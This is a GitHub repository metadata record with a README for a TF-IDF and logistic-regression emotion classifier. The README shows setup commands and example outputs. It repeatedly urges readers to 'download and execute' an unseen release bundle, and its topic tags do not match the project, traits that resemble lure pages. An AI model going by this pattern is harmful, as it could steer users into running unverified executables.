{"id":30360469,"url":"https://github.com/bakrawy2025/emotion-sentiment-classifier","last_synced_at":"2025-08-19T14:22:48.550Z","repository":{"id":310450642,"uuid":"1039832097","full_name":"Bakrawy2025/emotion-sentiment-classifier","owner":"Bakrawy2025","description":"Emotion \u0026 sentiment classifier in Python using TF-IDF + Logistic Regression (scikit-learn). Includes joblib model saving, evaluation and CLI prediction. 🐱💻","archived":false,"fork":false,"pushed_at":"2025-08-18T06:12:55.000Z","size":1612,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-08-18T08:22:33.837Z","etag":null,"topics":["audio-processing","confusion-matrix","data-science","emotion-detection-emotion-classification","emotion-recognition","interactive-prediction","jupyter-notebook","lstm-sentiment-analysis","machine-learning","naive-bayes-classifier","nltk","recurrent-neural-networks","scikit-learn","social","speech-analysis","tensorflow","text-classification","tweets"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Bakrawy2025.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-08-18T03:47:47.000Z","updated_at":"2025-08-18T06:12:58.000Z","dependencies_parsed_at":"2025-08-18T08:22:55.716Z","dependency_job_id":"6a9ebbae-301d-4cbb-a76c-a6eaba569c35","html_url":"https://github.com/Bakrawy2025/emotion-sentiment-classifier","commit_stats":null,"previous_names":["bakrawy2025/emotion-sentiment-classifier"
],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/Bakrawy2025/emotion-sentiment-classifier","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Bakrawy2025","download_url":"https://codeload.github.com/Bakrawy2025/emotion-sentiment-classifier/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Bakrawy2025%2Femotion-sentiment-classifier/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271166835,"owners_count":24710579,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["audio-processing","confusion-matrix","data-science","emotion-detection-emotion-classification","emotion-recognition","interactive-prediction","jupyter-notebook","lstm-sentiment-analysis","machine-learning","naive-ba
yes-classifier","nltk","recurrent-neural-networks","scikit-learn","social","speech-analysis","tensorflow","text-classification","tweets"],"created_at":"2025-08-19T14:22:47.076Z","updated_at":"2025-08-19T14:22:48.532Z","avatar_url":"https://github.com/Bakrawy2025.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Emotion Sentiment Classifier — Detect Emotions in Text Fast\n\n[![Releases](https://img.shields.io/badge/releases-download-blue.svg)](https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases)\n\n![Hero Image](https://images.unsplash.com/photo-1531297484001-80022131f5a1?ixlib=rb-4.0.3\u0026q=80\u0026fm=jpg\u0026crop=entropy\u0026cs=tinysrgb\u0026dl=rawpixel-740015-unsplash.jpg)\n\nTable of contents\n- About 📘\n- Features ✨\n- Demo 🎯\n- Quick start ▶️\n- Installation — download and execute release file 🗂️\n- Usage — CLI and interactive prediction 🛠️\n- Data pipeline and model details ⚙️\n- Evaluation and metrics 📊\n- Examples — input / output pairs 🧾\n- API and integration 🔗\n- Contributing 🤝\n- License \u0026 credits ©\n\nAbout 📘\nUnderstanding human emotions in text helps many tasks: customer feedback analysis, chat moderation, market research, and UX design. This repository provides a working pipeline for emotion detection and sentiment classification. It uses TF-IDF vectorization and a logistic regression core implemented with scikit-learn. 
The project outputs probabilistic emotion labels and a compact confusion-matrix-based report for model evaluation.\n\nFeatures ✨\n- Text classification for multiple emotions (joy, sadness, anger, fear, surprise, disgust) and binary sentiment (positive/negative).\n- TF-IDF vectorization tuned for short text and reviews.\n- Logistic regression classifier with hyperparameter presets and cross-validation.\n- Data cleaning and basic NLP preprocessing: tokenization, stopword removal, simple lemmatization.\n- Balanced class handling and weighted metrics.\n- Interactive prediction script for quick local checks.\n- Evaluation tools: confusion matrix, precision/recall, F1, ROC curves for sentiment class.\n- Exportable model artifacts and pipeline via Releases.\n\nDemo 🎯\nLive demo assets appear in releases. The release bundle contains:\n- Trained model pickle files\n- Vectorizer and preprocessing pipeline\n- CLI scripts for batch prediction\n- Small web demo (Flask) for local testing\n\nDownload and run the release bundle from:\nhttps://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\nDownload the release file and run it as described in the Installation section below.\n\nQuick start ▶️\n1. Visit the releases page and download the latest asset:\n   https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\n2. Extract the package and run the interactive predictor or the web demo.\n3. Feed text and get emotion and sentiment labels with probability scores.\n\nInstallation — download and execute release file 🗂️\nThe repository provides release archives with executable scripts and trained models. Pick the latest release and follow these steps.\n\nUnix / macOS\n1. Download the archive (replace vX.Y and emotion_release.zip in the URL with the actual tag and asset name from releases):\n   ```\n   curl -L -o emotion_release.zip \"https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases/download/vX.Y/emotion_release.zip\"\n   ```\n2. 
Unzip and enter the folder:\n   ```\n   unzip emotion_release.zip\n   cd emotion-sentiment-classifier\n   ```\n3. Create a virtual environment and install dependencies:\n   ```\n   python3 -m venv venv\n   source venv/bin/activate\n   pip install -r requirements.txt\n   ```\n4. Run the interactive CLI predictor:\n   ```\n   python3 scripts/predict_cli.py\n   ```\n5. Or run the local Flask demo:\n   ```\n   python3 web/app.py\n   # open http://127.0.0.1:5000 in your browser\n   ```\n\nWindows (PowerShell)\n1. Download the asset from the releases page.\n2. Extract, create a virtual environment and install:\n   ```\n   python -m venv venv\n   .\\venv\\Scripts\\activate\n   pip install -r requirements.txt\n   ```\n3. Run the CLI:\n   ```\n   python scripts\\predict_cli.py\n   ```\n\nIf the release link ever fails, check the Releases section on the repository page.\n\nUsage — CLI and interactive prediction 🛠️\nCLI usage (batch)\n- Predict labels for a CSV file with a text column named \"text\":\n  ```\n  python scripts/predict_batch.py --input data/reviews.csv --text-col text --output predictions.csv\n  ```\n- Options:\n  - --model: path to model pickle\n  - --vectorizer: path to TF-IDF vectorizer\n  - --threshold: probability cutoff for label assignment\n\nInteractive CLI\n- The interactive script opens a prompt. 
Type a sentence and get labels and confidences.\n  ```\n  $ python scripts/predict_cli.py\n  \u003e I'm so happy with the service!\n  Emotion: joy (0.92)\n  Sentiment: positive (0.98)\n  ```\n\nLocal web demo (Flask)\n- The demo offers an input box and a probability bar chart for emotion scores.\n- Run web/app.py and use the local URL shown in the console.\n\nData pipeline and model details ⚙️\nPreprocessing pipeline\n- Lowercase normalization\n- Unicode cleanup\n- URL and mention removal\n- Tokenization with regex\n- Stopword removal (NLTK stopword list)\n- Optional simple lemmatization (WordNet)\n\nFeature engineering\n- TF-IDF vectorization on unigrams and bigrams\n- Max features configurable (default 30k)\n- Min and max document frequency thresholds to reduce noise\n\nModel\n- Core classifier: scikit-learn LogisticRegression (solver: lbfgs)\n- Multi-class handled with multinomial option\n- Class weights set to balanced by default\n- Pipeline stores vectorizer and classifier together for predict_proba and transform\n\nTraining pipeline\n- Train/test split with stratification\n- Hyperparameter grid search around C (regularization) and ngram range\n- Cross-validation with 5 folds\n- Early export of best model for inference\n\nEvaluation and metrics 📊\nThe repo includes scripts to generate the following:\n- Confusion matrix and heatmap\n- Accuracy, macro F1, macro precision, macro recall\n- Per-class support and weighted metrics\n- ROC-AUC for binary sentiment\n- Calibration plots for model probability checks\n\nSample evaluation command:\n```\npython scripts/evaluate.py --pred predictions.csv --true labels.csv --output eval_report/\n```\n\nVisualizations\n- Confusion matrix plot using seaborn\n- Class probability distribution plots\n- Precision-recall curves for hard-to-detect emotions\n\nExamples — input / output pairs 🧾\nSmall example inputs and expected outputs:\n\nInput: \"I can't believe this happened. 
I'm furious.\"\nOutput:\n- Emotion: anger (0.94)\n- Sentiment: negative (0.89)\n\nInput: \"What a pleasant surprise. That made my day!\"\nOutput:\n- Emotion: joy (0.87), surprise (0.58)\n- Sentiment: positive (0.95)\n\nInput: \"The product broke after one day. Very disappointed.\"\nOutput:\n- Emotion: sadness (0.72), disgust (0.48)\n- Sentiment: negative (0.93)\n\nThese pairs mirror real use cases in feedback and social monitoring. The model returns multiple emotion probabilities so downstream logic can combine or threshold labels.\n\nAPI and integration 🔗\nThe package includes a small Flask app that exposes a REST API for quick integration:\n- POST /predict\n  - payload: { \"text\": \"...\" }\n  - response: { \"emotions\": { \"joy\": 0.7, ... }, \"sentiment\": { \"positive\": 0.8, \"negative\": 0.2 } }\n\nExample curl:\n```\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"text\":\"I love this product!\"}' \\\n  http://127.0.0.1:5000/predict\n```\n\nDeployment hints\n- Serve the model behind a light WSGI server (gunicorn)\n- Use batching for high throughput\n- Persist vectorizer and model artifacts to the same storage used during training\n\nModel export\n- The Releases archive includes these artifacts:\n  - pipeline.pkl (pickled vectorizer + classifier)\n  - labels.json (label mapping)\n  - requirements.txt\n\nContributing 🤝\n- Fork the repository and open a PR with a clear description of changes.\n- Add tests for data cleaning, vectorizer outputs, and the predict endpoint.\n- Keep each change small and focused, and document new functionality in README and code.\n- Use the same style for scripts and follow the existing import patterns.\n\nRepository topics and tags\nThis project matches topics:\nartificial-intelligence, confusion-matrix, data-cleaning, data-science, data-visualization, emotion-detection, interactive-prediction, logistic-regression, machine-learning, model-evaluation, natural-language-processing, python, scikit-learn, sentiment-analysis, text-classification, 
tf-idf-vectorization\n\nThese tags help surface the repo in searches for related projects.\n\nAssets and releases\nFind downloadable release bundles here:\n[![Download Releases](https://img.shields.io/badge/Get%20Releases-%20Download%20Now-blue.svg)](https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases)\n\nThe release file includes a runnable demo script. Download that file and execute it per the Installation section instructions. If the link fails, check the repository Releases section for alternate assets.\n\nFiles of interest\n- scripts/predict_cli.py — interactive CLI\n- scripts/predict_batch.py — CSV batch processing\n- scripts/train.py — training and export\n- scripts/evaluate.py — metrics and plots\n- web/app.py — small Flask demo\n- requirements.txt — dependency pin list\n\nLicense \u0026 credits ©\n- License: Apache-2.0 (see the LICENSE file)\n- Main implementation: Python, scikit-learn, pandas, numpy, seaborn, Flask\n- Data sources: mix of synthetic and public sentiment datasets for examples and small demos\n\nContact\n- Repo and releases: https://github.com/Bakrawy2025/emotion-sentiment-classifier/releases\n- Open an issue for help, feature requests, or bugs.\n\nScreenshots and visuals\n![Confusion Matrix Example](https://upload.wikimedia.org/wikipedia/commons/2/2c/Confusion_matrix.svg)\n\n![TF-IDF illustration](https://miro.medium.com/max/1400/1*0H6G5o6VnBLX6q4ts4Y53w.png)\n\nMaintenance checklist\n- Keep dependencies updated and test for breaking changes.\n- Re-train models when new labeled data arrives.\n- Monitor per-class performance to detect drift.\n\nThis document contains core usage, install steps, API details, and pointers to the distribution assets. 
Follow the Releases link to download and execute the packaged bundle for local testing and rapid integration.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbakrawy2025%2Femotion-sentiment-classifier/lists"}